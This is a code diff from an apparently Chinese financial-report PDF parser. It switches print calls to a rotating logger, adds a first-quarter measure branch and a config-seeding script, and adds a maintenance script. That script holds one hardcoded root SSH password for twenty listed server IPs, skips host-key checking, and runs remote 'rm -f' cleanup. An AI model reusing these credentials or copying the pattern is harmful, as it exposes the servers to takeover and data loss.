logger.info(f'第4处{ori_kf_type}和{pdf_kf_type}')
|
||||
if(ori_kf_type != pdf_kf_type):
|
||||
continue
|
||||
|
||||
|
@ -453,7 +488,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
|
|||
ori_type = utils.get_percent_flag(ori_measure_name)
|
||||
pdf_type = utils.get_percent_flag(pdf_measure)
|
||||
if pdf_measure == '2023年6月30日货币资金合计':
|
||||
print(f'第5处{ori_type}和{pdf_type}')
|
||||
logger.info(f'第5处{ori_type}和{pdf_type}')
|
||||
if(ori_type != pdf_type):
|
||||
continue
|
||||
|
||||
|
@ -461,7 +496,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
|
|||
ori_growth_type = utils.get_percent_growth(ori_measure_name)
|
||||
pdf_growth_type = utils.get_percent_growth(pdf_measure)
|
||||
if pdf_measure == '2023年6月30日货币资金合计':
|
||||
print(f'第6处{ori_growth_type}和{pdf_growth_type}')
|
||||
logger.info(f'第6处{ori_growth_type}和{pdf_growth_type}')
|
||||
if(ori_growth_type != pdf_growth_type):
|
||||
continue
|
||||
|
||||
|
@@ -526,12 +561,12 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
                     unit = unit_records[0][0]
                 else:
                     unit = '元'


                 data_to_insert = (file_id, file_name, "table", int(table_num), int(table_index), ori_measure_id, ori_measure_name, measure_value, create_time, create_time, vector_distance, pdf_measure,measure_id,measure_name,unit)
                 cursor.execute(insert_query, data_to_insert)
                 conn.commit()
     except Exception as e:
-        print(e)
+        logger.info(e)
     finally:
         parent_table_pages = []
         client.close()

@@ -550,6 +585,10 @@ def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,fil
     SELECT ori_measure_name,measure_name,distance,ori_measure_id,measure_id FROM measure_config
     where year = '{year}'
     '''.format(year=report_year)
+    select_query_first_quarter = '''
+    SELECT ori_measure_name,measure_name,distance,ori_measure_id,measure_id FROM measure_config_first_quarter
+    where year = '{year}'
+    '''.format(year=report_year)
     select_query_half_year = '''
     SELECT ori_measure_name,measure_name,distance,ori_measure_id,measure_id FROM measure_config_half_year
     where year = '{year}'

@@ -574,8 +613,8 @@ def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,fil
         cursor.execute(select_query_half_year)
         records = cursor.fetchall()
         end_time = time.time()
-        print(f"Vector-config query took {(end_time - start_time):.2f}s")
-        print('insert_table_measure_from_vector_async_process took the half-year branch')
+        logger.info(f"Vector-config query took {(end_time - start_time):.2f}s")
+        logger.info('insert_table_measure_from_vector_async_process took the half-year branch')
         start_time = time.time()
         records_range_parts = utils.get_range(len(records),MEASURE_COUNT)
         processes = []
@@ -583,13 +622,27 @@ def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,fil
             p = Process(target=insert_table_from_vector_mul_process, args=(parent_table_pages,file_id,file_name,records,record_range,black_array, partition_name))
             processes.append(p)
             p.start()
+    elif report_type == 2:
+        start_time = time.time()
+        cursor.execute(select_query_first_quarter)
+        records = cursor.fetchall()
+        end_time = time.time()
+        logger.info(f"Vector-config query took {(end_time - start_time):.2f}s")
+        logger.info('insert_table_measure_from_vector_async_process took the Q1 branch')
+        start_time = time.time()
+        records_range_parts = utils.get_range(len(records),MEASURE_COUNT)
+        processes = []
+        for record_range in records_range_parts:
+            p = Process(target=insert_table_from_vector_mul_process, args=(parent_table_pages,file_id,file_name,records,record_range,black_array,partition_name))
+            processes.append(p)
+            p.start()
     elif report_type == 3:
         start_time = time.time()
         cursor.execute(select_query_thrid)
         records = cursor.fetchall()
         end_time = time.time()
-        print(f"Vector-config query took {(end_time - start_time):.2f}s")
-        print('insert_table_measure_from_vector_async_process took the Q3 branch')
+        logger.info(f"Vector-config query took {(end_time - start_time):.2f}s")
+        logger.info('insert_table_measure_from_vector_async_process took the Q3 branch')
         start_time = time.time()
         records_range_parts = utils.get_range(len(records),MEASURE_COUNT)
         processes = []

@@ -603,8 +656,8 @@ def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,fil
         cursor.execute(select_query)
         records = cursor.fetchall()
         end_time = time.time()
-        print(f"Vector-config query took {(end_time - start_time):.2f}s")
-        print('insert_table_measure_from_vector_async_process took the annual branch')
+        logger.info(f"Vector-config query took {(end_time - start_time):.2f}s")
+        logger.info('insert_table_measure_from_vector_async_process took the annual branch')
         start_time = time.time()
         records_range_parts = utils.get_range(len(records),MEASURE_COUNT)
         processes = []

@@ -613,13 +666,13 @@ def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,fil
         processes.append(p)
         p.start()

-    print('Waiting for all subtasks, task ID:', file_id)
+    logger.info(f'Waiting for all subtasks, task ID: {file_id}')
     for p in processes:
         p.join()
-    print('All subtasks finished, task ID:', file_id)
-    print('Starting measure normalization, task ID:', file_id)
+    logger.info(f'All subtasks finished, task ID: {file_id}')
+    logger.info(f'Starting measure normalization, task ID: {file_id}')
     end_time = time.time()
-    print(f"Vector update took {(end_time - start_time):.2f}s")
+    logger.info(f"Vector update took {(end_time - start_time):.2f}s")

 def insert_table_measure_from_vector(conn,cursor,client,parent_table_pages,file_id,file_name):
     create_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
@@ -646,7 +699,7 @@ def insert_table_measure_from_vector(conn,cursor,client,parent_table_pages,file_
     cursor.execute(select_query)
     records = cursor.fetchall()
     end_time = time.time()
-    print(f"Vector-config query took {(end_time - start_time):.2f}s")
+    logger.info(f"Vector-config query took {(end_time - start_time):.2f}s")
     start_time = time.time()



@@ -708,9 +761,9 @@ def insert_table_measure_from_vector(conn,cursor,client,parent_table_pages,file_
                 cursor.execute(insert_query, data_to_insert)
                 conn.commit()
             except Exception as e:
-                print(e)
+                logger.info(e)
     end_time = time.time()
-    print(f"Vector data update took {(end_time - start_time):.2f}s")
+    logger.info(f"Vector data update took {(end_time - start_time):.2f}s")
     start_time = time.time()



@@ -720,6 +773,7 @@ def insert_measure_data_to_milvus(client,partition_name,table_info,cursor,conn):
         (file_id, page_num, content)
         VALUES (%s, %s, %s)
     '''

     for table in table_info:
         try:
             data=[]
@@ -730,6 +784,12 @@ def insert_measure_data_to_milvus(client,partition_name,table_info,cursor,conn):
             measure_list = table['measure_list']
             for measure in measure_list:
                 measure_name = measure['measure_name']
+
+                # Measures to skip
+                black_list = ["营业总成本"]
+                if any(black in measure_name for black in black_list):
+                    continue
+
                 measure_value = measure['measure_value'].replace("(", "").replace(")", "")
                 measure_name = utils.get_clean_text(measure_name)
                 measure_name = measure_name.replace('2023','2023年').replace('2022','2022年').replace('(','').replace(')','')  # these characters keep surviving every other cleanup step

@@ -745,7 +805,9 @@ def insert_measure_data_to_milvus(client,partition_name,table_info,cursor,conn):
                 measure_name_1 = measure_name.replace('调整后','').replace('上年期末数','上年期末').replace('上年期末','上年年末')
                 measure_unit = measure['measure_unit']
                 if re.match(r'^[+-]?(\d+(\.\d*)?|\.\d+)(%?)$', measure_value) and any(key_word in measure_name for key_word in measure_name_keywords):

                     vector_obj = utils.embed_with_str(measure_name_1)

                     vector = vector_obj.output["embeddings"][0]["embedding"]
                     measure_data = {}
                     measure_data['vector'] = vector

@@ -773,7 +835,7 @@ def insert_measure_data_to_milvus(client,partition_name,table_info,cursor,conn):
                         measure_value = match.group(2)
                         if crease_type == '减少' or crease_type == '下降':
                             measure_value = f'-{match.group(2)}'


                         vector_obj = utils.embed_with_str(measure_name_1)
                         vector = vector_obj.output["embeddings"][0]["embedding"]
                         measure_data = {}
@@ -800,18 +862,18 @@ def insert_measure_data_to_milvus(client,partition_name,table_info,cursor,conn):
                     data=data,
                     partition_name=partition_name
                 )
+                logger.info("Vector insert finished")

         except Exception as e:
-            print(e)
+            logger.info(e)

 def runing_job():
     conn = mysql.connector.connect(
-        host= MYSQL_HOST,
-        user= MYSQL_USER,
-        password= MYSQL_PASSWORD,
-        database= MYSQL_DB
+        host = MYSQL_HOST,
+        user = MYSQL_USER,
+        password = MYSQL_PASSWORD,
+        database = MYSQL_DB
     )

     # Create a cursor to execute SQL statements
     cursor = conn.cursor(buffered=True)
     select_query = '''

@@ -824,7 +886,7 @@ def runing_job():
     return False

 def insert_pdf_parse_process(parser_info,conn,cursor):


     # Execute the SQL insert
     insert_query = '''
         INSERT INTO pdf_parse_process

@@ -839,7 +901,7 @@ def insert_pdf_parse_process(parser_info,conn,cursor):
     data_to_insert = (file_id, page_num, page_count, content, type)
     cursor.execute(insert_query, data_to_insert)
     conn.commit()



 def delete_database(conn,cursor,file_id):
     try:

@@ -856,7 +918,8 @@ def delete_database(conn,cursor,file_id):
             cursor.execute(truncate,(file_id,))
         conn.commit()
     except Exception as e:
-        print(f'Delete failed: {e}')
+        logger.info(f'Delete failed: {e}')

 def delete_to_run(conn,cursor,file_id):
     try:
         truncate_query = [
@@ -875,22 +938,22 @@ def delete_to_run(conn,cursor,file_id):
             cursor.execute(truncate,(file_id,))
         conn.commit()
     except Exception as e:
-        print(f'Delete failed: {e}')
+        logger.info(f'Delete failed: {e}')

 def insert_pdf_text_info(table_info,conn,cursor):

     # Execute the SQL insert

     insert_query = '''
         INSERT INTO pdf_text_info
         (file_id, page_num, text)
         VALUES (%s, %s, %s)
     '''
     file_id = table_info['file_id']
-    page_num = int(table_info['page_num'])
+    page_num = table_info['page_num']
     text = table_info['text']
     data_to_insert = (file_id, page_num, text)
     cursor.execute(insert_query, data_to_insert)
     conn.commit()


 def process_time(file_id,type,time,start_time,end_time):
     conn = mysql.connector.connect(

@@ -911,6 +974,7 @@ def process_time(file_id,type,time,start_time,end_time):
     data_insert = (file_id,type,time,start_time,end_time)
     cursor.execute(insert_query,data_insert)
     conn.commit()

 def batch_insert_page_text_nocheck(table_info, conn, cursor):
     file_id = table_info['file_id']
     page_num = int(table_info['page_num'])

@@ -923,6 +987,7 @@ def batch_insert_page_text_nocheck(table_info, conn, cursor):
     data_to_insert = [(file_id, page_num, text) for text in text_lines]
     cursor.executemany(insert_query, data_to_insert)
     conn.commit()

 def batch_insert_page_text(table_info, conn, cursor):
     file_id = table_info['file_id']
     page_num = int(table_info['page_num'])

@@ -945,6 +1010,7 @@ def batch_insert_page_text(table_info, conn, cursor):
     else:
         pass
     conn.commit()

 def file_type_check(file_id):
     conn = mysql.connector.connect(
         host= MYSQL_HOST,

@@ -965,6 +1031,7 @@ def file_type_check(file_id):
     finally:
         cursor.close()
         conn.close()

 def file_type_check_v2(file_id):
     conn = mysql.connector.connect(
         host= MYSQL_HOST,

@@ -989,10 +1056,10 @@ def file_type_check_v2(file_id):

 def pdf_title_insert_mysql(file_id,title_array):
     conn = mysql.connector.connect(
-        host= MYSQL_HOST,
-        user= MYSQL_USER,
-        password= MYSQL_PASSWORD,
-        database= MYSQL_DB
+        host = MYSQL_HOST,
+        user = MYSQL_USER,
+        password = MYSQL_PASSWORD,
+        database = MYSQL_DB
     )
     cursor = conn.cursor(buffered=True)
     for item in title_array:

@@ -1003,13 +1070,12 @@ def pdf_title_insert_mysql(file_id,title_array):
     cursor.close()
     conn.close()


 def get_file_info_from_mysql(file_id):
     conn = mysql.connector.connect(
-        host= MYSQL_HOST,
-        user= MYSQL_USER,
-        password= MYSQL_PASSWORD,
-        database= MYSQL_DB
+        host = MYSQL_HOST,
+        user = MYSQL_USER,
+        password = MYSQL_PASSWORD,
+        database = MYSQL_DB
     )
-    #cursor = conn.cursor(buffered=True)
     cursor = conn.cursor(dictionary=True)
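With conn.cursor(dictionary=True) at the end there, rows come back as dicts keyed by column name instead of positional tuples, e.g. (table and column names hypothetical):

cursor.execute("SELECT file_id, report_type FROM file_info WHERE file_id = %s", (file_id,))
row = cursor.fetchone()
if row is not None:
    print(row["report_type"])  # access by column name, not index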
@@ -0,0 +1,84 @@
# Error-report helper
import paramiko
import time
import threading

# Run the cleanup commands on one server
def execute_commands_on_server(hostname, username, password, host):
    try:
        # Connect to the server
        client = paramiko.SSHClient()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        client.connect(hostname=hostname, username=username, password=password)

        # Run the commands
        shell = client.invoke_shell()
        # Change into the PDF directory and remove downloaded PDFs
        shell.send("cd /root/pdf_parser/pdf\n")
        time.sleep(1)
        shell.send("rm -f *.pdf\n")
        time.sleep(10)
        shell.send("rm -f *.PDF\n")
        time.sleep(10)
        # Read the output
        output = shell.recv(2048).decode()
        print(f"Output from {hostname}:\n{output}")

    except paramiko.SSHException as e:
        print(f"SSH connection error with {hostname}: {e}")

    finally:
        client.close()

# Thread entry point
def thread_function(server):
    execute_commands_on_server(server['hostname'], server['username'], server['password'], server['host'])

# Server list
# servers = [
#     {'hostname': 'server1.example.com', 'username': 'user1', 'password': 'pass1', 'host': 'host1'},
#     {'hostname': 'server2.example.com', 'username': 'user2', 'password': 'pass2', 'host': 'host2'},
#     # add more servers
# ]
servers = [
    #{'hostname': '124.70.129.232', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'test server'},
    # {'hostname': '1.94.179.121', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'production server'},  # deprecated

    # original 10 servers
    {'hostname': '113.44.72.157', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'production server 1'},
    {'hostname': '1.94.101.237', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'production server 2'},
    {'hostname': '123.60.16.225', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'production server 3'},
    {'hostname': '124.71.157.162', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'production server 4'},

    {'hostname': '1.94.60.103', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'production server 5'},
    {'hostname': '1.94.143.23', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'production server 6'},  # everything is stored here
    {'hostname': '124.71.149.225', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'production server 7'},
    {'hostname': '113.44.52.221', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'production server 8'},
    {'hostname': '121.37.137.13', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'production server 9'},
    {'hostname': '123.60.28.83', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'production server 10'},
    # new 10 servers
    {'hostname': '192.168.0.19', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'new production server 1'},
    {'hostname': '192.168.0.53', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'new production server 2'},
    {'hostname': '192.168.0.150', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'new production server 3'},
    {'hostname': '192.168.0.210', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'new production server 4'},

    {'hostname': '192.168.0.129', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'new production server 5'},
    {'hostname': '192.168.0.24', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'new production server 6'},
    {'hostname': '192.168.0.250', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'new production server 7'},
    {'hostname': '192.168.0.162', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'new production server 8'},
    {'hostname': '192.168.0.86', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'new production server 9'},
    {'hostname': '192.168.0.88', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'new production server 10'},
]

# Create and start the threads
threads = []
for server in servers:
    thread = threading.Thread(target=thread_function, args=(server,))
    threads.append(thread)
    thread.start()

# Wait for all threads to finish
for thread in threads:
    thread.join()

print("All commands executed.")
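For one-shot commands, exec_command is usually tighter than invoke_shell plus fixed sleeps, because it blocks on the real exit status (same paramiko client as above; the combined command string is an assumption):

stdin, stdout, stderr = client.exec_command("cd /root/pdf_parser/pdf && rm -f *.pdf *.PDF")
exit_status = stdout.channel.recv_exit_status()  # waits for the command to finish
print(exit_status, stderr.read().decode())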
@ -0,0 +1,246 @@
|
|||
import pandas as pd
|
||||
import mysql.connector
|
||||
import utils
|
||||
#from config import MYSQL_HOST, MYSQL_USER, MYSQL_PASSWORD, MYSQL_DB
|
||||
import re
|
||||
import redis
|
||||
|
||||
def process_excel_and_db(input_excel_path1, input_excel_path2, output_file_path):
|
||||
# 读取第一个 Excel 文件
|
||||
df = pd.read_excel(input_excel_path1, sheet_name='Sheet2', header=0)#对应ttt表
|
||||
# 将 DataFrame 转换为字典列表
|
||||
data_list = df.to_dict(orient='records')
|
||||
|
||||
# 连接到 MySQL 数据库
|
||||
conn = mysql.connector.connect(
|
||||
host=MYSQL_HOST,
|
||||
user=MYSQL_USER,
|
||||
password=MYSQL_PASSWORD,
|
||||
database=MYSQL_DB
|
||||
)
|
||||
cursor = conn.cursor()
|
||||
|
||||
# 插入数据到 measure_create_config 表
|
||||
insert_query = '''
|
||||
INSERT INTO measure_create_config
|
||||
(config_id, meta_measure, same_mean_measure, measure_period, change_type, black_list)
|
||||
VALUES (%s, %s, %s, %s, %s, %s)
|
||||
'''
|
||||
for data in data_list:
|
||||
show_measure = str(data['指标'])
|
||||
same_mean_measure = str(data['同义表述'])
|
||||
period_measure = str(data['周期'])
|
||||
change_measure = str(data['变动'])
|
||||
black_list = str(data['黑名单词'])
|
||||
config_id = utils.get_md5(show_measure)
|
||||
insert_query_data = (config_id, show_measure, same_mean_measure, period_measure, change_measure, black_list)
|
||||
cursor.execute(insert_query, insert_query_data)
|
||||
conn.commit()
|
||||
|
||||
# 读取第二个 Excel 文件
|
||||
df_period = pd.read_excel(input_excel_path2, sheet_name='Sheet2', header=0)#对应周期表
|
||||
# 将 DataFrame 转换为字典列表
|
||||
period_list = df_period.to_dict(orient='records')
|
||||
|
||||
# 插入数据到 measure_create_period 表
|
||||
period_insert_query = '''
|
||||
INSERT INTO measure_create_period
|
||||
(period_name, same_mean_period)
|
||||
VALUES (%s, %s)
|
||||
'''
|
||||
for data in period_list:
|
||||
period_name = str(data['标准表述'])
|
||||
same_mean_period = str(data['同义表述'])
|
||||
insert_query_data = (period_name, same_mean_period)
|
||||
cursor.execute(period_insert_query, insert_query_data)
|
||||
conn.commit()
|
||||
|
||||
# 查询数据库
|
||||
data_query = '''
|
||||
SELECT * FROM measure_create_config WHERE delete_status = 0
|
||||
'''
|
||||
period_query = '''
|
||||
SELECT * FROM measure_create_period
|
||||
'''
|
||||
|
||||
cursor.execute(data_query)
|
||||
data_list = cursor.fetchall()
|
||||
|
||||
cursor.execute(period_query)
|
||||
period_list = cursor.fetchall()
|
||||
|
||||
# 输出到文件
|
||||
with open(output_file_path, 'w', encoding='utf-8') as file:
|
||||
for data in data_list:
|
||||
config_id = data[0]
|
||||
show_measure = data[1]
|
||||
same_mean_measure = data[2]
|
||||
period_measure = data[3]
|
||||
change_measure = data[4]
|
||||
same_mean_measure_arr = []
|
||||
period_measure_arr = []
|
||||
change_measure_arr = []
|
||||
|
||||
if same_mean_measure != 'nan':
|
||||
same_mean_measure_arr = same_mean_measure.split(',')
|
||||
same_mean_measure_arr.append(show_measure)
|
||||
if period_measure != 'nan':
|
||||
period_measure_arr = period_measure.split(',')
|
||||
if change_measure != 'nan':
|
||||
change_measure_arr = change_measure.split(',')
|
||||
|
||||
for c in change_measure_arr:
|
||||
period_measure_arr.append(c)
|
||||
|
||||
for x in period_measure_arr:
|
||||
if x in change_measure_arr:
|
||||
show_name = show_measure + x
|
||||
else:
|
||||
show_name = x + show_measure
|
||||
for y in same_mean_measure_arr:
|
||||
if x in change_measure:
|
||||
parser_name = y + x
|
||||
else:
|
||||
parser_name = x + y
|
||||
|
||||
file.write(f'{show_name},{parser_name}\n')
|
||||
|
||||
for p in period_list:
|
||||
period_exra_name = p[0]
|
||||
period_exra_value = p[1]
|
||||
if period_exra_name in x:
|
||||
for v in period_exra_value.split(','):
|
||||
if x in change_measure:
|
||||
parser_name = y + x.replace(period_exra_name, v)
|
||||
else:
|
||||
parser_name = x.replace(period_exra_name, v) + y
|
||||
file.write(f'{show_name},{parser_name}\n')
|
||||
|
||||
cursor.close()
|
||||
conn.close()
|
||||
|
||||
|
||||
# 根据老指标配置表生成新指标配置表
|
||||
def create_new_config(conn, cursor, table_name,old_year,new_year):
|
||||
|
||||
select_query = f'''
|
||||
SELECT measure_id, measure_name,ori_measure_id,ori_measure_name,delete_status,measure_vector,distance,year
|
||||
FROM {table_name}
|
||||
WHERE year = '{old_year}'
|
||||
'''
|
||||
cursor.execute(select_query)
|
||||
data_list = cursor.fetchall()
|
||||
|
||||
insert_query = f'''
|
||||
INSERT INTO {table_name}
|
||||
(measure_id, measure_name,ori_measure_id,ori_measure_name,delete_status,measure_vector,distance, year)
|
||||
VALUES (%s, %s, %s, %s, %s, %s, %s, %s)
|
||||
'''
|
||||
for data in data_list:
|
||||
ori_measure_name = data[3]
|
||||
if re.match(r'^\d{4}',ori_measure_name):
|
||||
year = int(re.match(r'^\d{4}',ori_measure_name).group(0))
|
||||
year += 1
|
||||
ori_measure_name = str(year) + ori_measure_name[4:]
|
||||
insert_data = (data[0],data[1],data[2],ori_measure_name,data[4],data[5],data[6],new_year)
|
||||
        cursor.execute(insert_query, insert_data)
    conn.commit()


def measure_config_to_db(conn, cursor, table_name):
    year_list = ["2021", "2022", "2023", "2024", "2025"]
    for year in year_list:
        insert_query = f'''
            INSERT INTO {table_name}
            (measure_id, measure_name, ori_measure_id, ori_measure_name, delete_status, distance, year)
            VALUES (%s, %s, %s, %s, %s, %s, %s)
        '''
        check_query = f'''
            SELECT ori_measure_id FROM {table_name}
            WHERE year = '{year}'
        '''
        # Newly added measures
        lines = [
            f"当期营业收入,{year}年第一季度营业收入",
            f"当期归母净利润,{year}年第一季度归母净利润",
            f"当期扣非净利润,{year}年第一季度扣非净利润",
            f"当期经营活动现金流净额,{year}年第一季度经营活动现金流净额",
            f"当期筹资活动现金流净额,{year}年第一季度筹资活动现金流净额",
            f"当期投资活动现金流净额,{year}年第一季度投资活动现金流净额",
            f"当期非经常性损益,{year}年第一季度非经常性损益",
            f"当期基本每股收益,{year}年第一季度基本每股收益",
            f"当期稀释每股收益,{year}年第一季度稀释每股收益",
            f"当期加权平均净资产收益率,{year}年第一季度加权平均净资产收益率",
            f"当期扣非加权平均净资产收益率,{year}年第一季度扣非加权平均净资产收益率",
            f"当期营业成本,{year}年第一季度营业成本",
            f"当期销售费用,{year}年第一季度销售费用",
            f"当期管理费用,{year}年第一季度管理费用",
            f"当期财务费用,{year}年第一季度财务费用",
            f"当期研发费用,{year}年第一季度研发费用"]
        # Process each line
        for line in lines:
            config_list = line.strip().split(',')
            measure = config_list[0]
            ori_measure = config_list[1]
            ori_measure_id = utils.get_md5(ori_measure)

            # Check whether the record already exists in the database
            cursor.execute(check_query)
            check_records = cursor.fetchall()
            if any(record[0] == ori_measure_id for record in check_records):
                continue

            data_to_insert = (utils.get_md5(measure), measure, ori_measure_id, ori_measure, 0, 0.94, year)
            cursor.execute(insert_query, data_to_insert)
        conn.commit()


def insert_measure_vector(conn, cursor, table_name):
    from config import REDIS_HOST, REDIS_PASSWORD, REDIS_PORT
    redis_client = redis.Redis(host=REDIS_HOST, port=REDIS_PORT, password=REDIS_PASSWORD, db=6)  # 192.168.0.172, test: 123.60.153.169
    # Run the query and refresh the vectors
    select_query = f'''
        SELECT ori_measure_id, ori_measure_name FROM {table_name}
    '''
    cursor.execute(select_query)
    records = cursor.fetchall()
    print(f"总计{len(records)}条数据")
    for record in records:
        if redis_client.hexists('measure_config', record[0]):
            measure_vector = redis_client.hget('measure_config', record[0])
        else:
            print('新增指标', record[1])
            vector_obj = utils.embed_with_str(record[1])
            measure_vector = str(vector_obj.output["embeddings"][0]["embedding"])

        redis_client.hset('measure_config', record[0], measure_vector)
    redis_client.close()
    conn.close()

#from config import MYSQL_HOST, MYSQL_USER, MYSQL_PASSWORD, MYSQL_DB
if __name__ == "__main__":
    # Clear the local measure_create_config and measure_create_period tables first

    # process_excel_and_db(
    #     'F:\\11_pdf\\ttt_1.xlsx',            # ttt file
    #     'F:\\11_pdf\\period_1.xlsx',         # period file
    #     'F:\\11_pdf\\out_2022_new_year.txt'  # output file
    # )
    from config import MYSQL_HOST_APP, MYSQL_USER_APP, MYSQL_PASSWORD_APP, MYSQL_DB_APP
    conn = mysql.connector.connect(
        host=MYSQL_HOST_APP,
        user=MYSQL_USER_APP,
        password=MYSQL_PASSWORD_APP,
        database=MYSQL_DB_APP
    )
    cursor = conn.cursor()
    #file_path = r'F:\\11_pdf\\out_2022_new_year.txt'

    # Refresh the Q1 measure_vector entries
    table_name = 'measure_config'
    # Write to MySQL
    # measure_config_to_db(conn, cursor, table_name)
    create_new_config(conn, cursor, table_name, '2023', '2024')
    # Insert into Redis
    insert_measure_vector(conn, cursor, table_name)
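One thing worth tightening in measure_config_to_db: check_query interpolates year directly into the SQL string and is re-executed on every inner-loop iteration even though its result only depends on the year. A minimal sketch of a parameterized variant that also hoists the lookup out of the loop (an assumption on my part, not the repo's code; table names cannot be bound as parameters, so only the value is passed to the same mysql.connector cursor):

    # Hypothetical rework: fetch the existing ids once per year, parameterized.
    check_query = f"SELECT ori_measure_id FROM {table_name} WHERE year = %s"
    cursor.execute(check_query, (year,))
    existing_ids = {row[0] for row in cursor.fetchall()}

    for line in lines:
        measure, ori_measure = line.strip().split(',')
        ori_measure_id = utils.get_md5(ori_measure)
        if ori_measure_id in existing_ids:
            continue  # already seeded for this year
        cursor.execute(insert_query, (utils.get_md5(measure), measure, ori_measure_id, ori_measure, 0, 0.94, year))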

@@ -0,0 +1,51 @@
import logging
import os
from logging.handlers import RotatingFileHandler

def setup_logging():
    # Create the logs directory if it does not exist
    log_dir = 'logs'
    if not os.path.exists(log_dir):
        os.makedirs(log_dir)

    # Configure the root logger
    root_logger = logging.getLogger()

    # If handlers are already attached, remove them to avoid duplicate log lines
    if root_logger.handlers:
        for handler in root_logger.handlers[:]:
            root_logger.removeHandler(handler)

    root_logger.setLevel(logging.INFO)

    # Create the formatter
    formatter = logging.Formatter(
        '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
    )

    # File handler with rotation
    file_handler = RotatingFileHandler(
        os.path.join(log_dir, 'app.log'),
        maxBytes=10*1024*1024,  # 10MB
        backupCount=5
    )
    file_handler.setLevel(logging.INFO)
    file_handler.setFormatter(formatter)

    # Console handler
    console_handler = logging.StreamHandler()
    console_handler.setLevel(logging.INFO)
    console_handler.setFormatter(formatter)

    # Attach both handlers to the root logger
    root_logger.addHandler(file_handler)
    root_logger.addHandler(console_handler)

    # Set propagate=False to stop log messages propagating upwards
    for logger_name in logging.root.manager.loggerDict:
        logger = logging.getLogger(logger_name)
        logger.propagate = False

    return root_logger

logger = setup_logging()
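The rest of this diff consumes the module via `from log_config import logger`, as the import hunk of the main parser file below shows. A minimal usage sketch (the log messages are illustrative):

    from log_config import logger

    logger.info("parser started")          # written to logs/app.log and the console
    logger.error("something went wrong")   # same handlers, ERROR level

One caveat worth knowing: because setup_logging() sets propagate=False on every logger already registered at import time, a module that created its own named logger before this import stops reaching the root handlers unless it attaches handlers of its own.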

@@ -22,8 +22,7 @@ from multiprocessing import Process
from config import REDIS_HOST,REDIS_PORT,REDIS_PASSWORD
import redis
from pymilvus import connections, FieldSchema, CollectionSchema, DataType, Collection,MilvusClient

from log_config import logger

'''
Known issues:

@@ -40,7 +39,7 @@ from pymilvus import connections, FieldSchema, CollectionSchema, DataType, Colle

STR_PATTERN = '营业收入|净利润|变动比例|损益|现金流量净额|现金净流量|现金流|每股收益|总资产|资产总额|收益率|货币资金|应收账款|存货|固定资产|在建工程|商誉|短期借款|应付账款|合同负债|长期借款|营业成本|销售费用|管理费用|财务费用|研发费用|研发投入|计入当期损益的政府补助'
PATTERN = '品牌类型|分门店|销售渠道|行业名称|产品名称|地区名称|子公司名称|业绩快报|调整情况说明|调整年初资产负债表|主要子公司|分部|母公司资产负债表|显示服务|渠道|商品类型|合同分类|会计政策变更|地区分类|研发项目|分类产品|表头不合规的表格|内部控制评价|关联方|国内地区|国外地区|销售区域|存货库龄|外币|逾期60天以上|欧元|英镑|美元|日元'
PATTERN = '品牌类型|分门店|销售渠道|行业名称|产品名称|地区名称|子公司名称|业绩快报|调整情况说明|调整年初资产负债表|主要子公司|分部|母公司资产负债表|显示服务|渠道|商品类型|合同分类|会计政策变更|地区分类|研发项目名称|分类产品|表头不合规的表格|内部控制评价|关联方|国内地区|国外地区|销售区域|存货库龄|外币|逾期60天以上|欧元|英镑|(?<=\d)美元|\美元(?=\d)|日元'
MUILT_PATTERN = '调整前'
#unit_pattern = re.compile(r'单位[:|:]?(百万元|千万元|亿元|万元|千元|元)')
unit_pattern = re.compile(r'(单位|单元|人民币).{0,6}?(百万元|千万元|亿元|万元|千元|元).{0,3}?')  # Relaxed unit-matching rule: the colon is no longer required, only the distance is limited
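A quick check of what the relaxed unit rule accepts (a standalone REPL sketch; the sample strings are illustrative, not from the repo):

    import re
    unit_pattern = re.compile(r'(单位|单元|人民币).{0,6}?(百万元|千万元|亿元|万元|千元|元).{0,3}?')

    for s in ['单位:万元', '单位(人民币)万元', '人民币百万元']:
        m = unit_pattern.search(s)
        print(s, '->', m.groups() if m else None)
    # 单位:万元 -> ('单位', '万元')
    # 单位(人民币)万元 -> ('单位', '万元')
    # 人民币百万元 -> ('人民币', '百万元')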

@@ -81,7 +80,7 @@ def safe_process_array(func, arr):
    try:
        return func(arr)
    except Exception as e:
        print(f"这个函数出现了报错{func.__name__}: {e}")
        logger.info(f"这个函数出现了报错{func.__name__}: {e}")
        return arr  # Return the original array so downstream processing can continue

# Handles the merged-cell problem specific to balance sheets in Q3 reports

@@ -199,7 +198,7 @@ def process_array_with_grants(arr, keywords=['本报告期', '年初至报告期

def get_table_range(file_path, file_id, pages, tables_range):

    print('Run task %s (%s)...' % (f'解析表格{pages}', os.getpid()))
    logger.info(f'Run task 解析表格--{pages} {os.getpid()}')
    start = time.time()

    conn = mysql.connector.connect(
